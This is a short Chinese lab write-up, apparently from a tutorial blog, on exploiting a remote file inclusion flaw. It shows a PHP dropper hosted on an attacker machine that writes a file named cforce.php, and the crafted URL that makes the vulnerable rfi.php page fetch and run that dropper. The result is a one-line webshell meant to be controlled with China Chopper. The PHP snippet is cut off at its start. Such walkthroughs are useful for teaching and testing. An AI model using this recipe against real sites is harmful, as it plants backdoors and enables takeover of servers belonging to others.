[基本实验] 远程文件包含

首先在自己的网站(10.0.3.88)中创建一个txt文件(test.txt),内容为:

";
$myfile = fopen("cforce.php", "w") or die("Unable to open file!");
fwrite($myfile,$payload);
fclose($myfile);
?>

随后访问存在漏洞的网站(10.0.3.82)并且构造特殊的URL:
http://10.0.3.82/rfi.php?file=http://10.0.3.88/test.txt
rfi.php是存在漏洞的网页
在漏洞网站的根目录下,生成了一个新的文件 cforce.php
cforce.php


这是一个一句话木马,可以通过中国菜刀去连接,获得webshell。

实验完毕,通过远程文件包含获得一个webshell

在这个漏洞环境下,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。

你可能感兴趣的:(基本实验)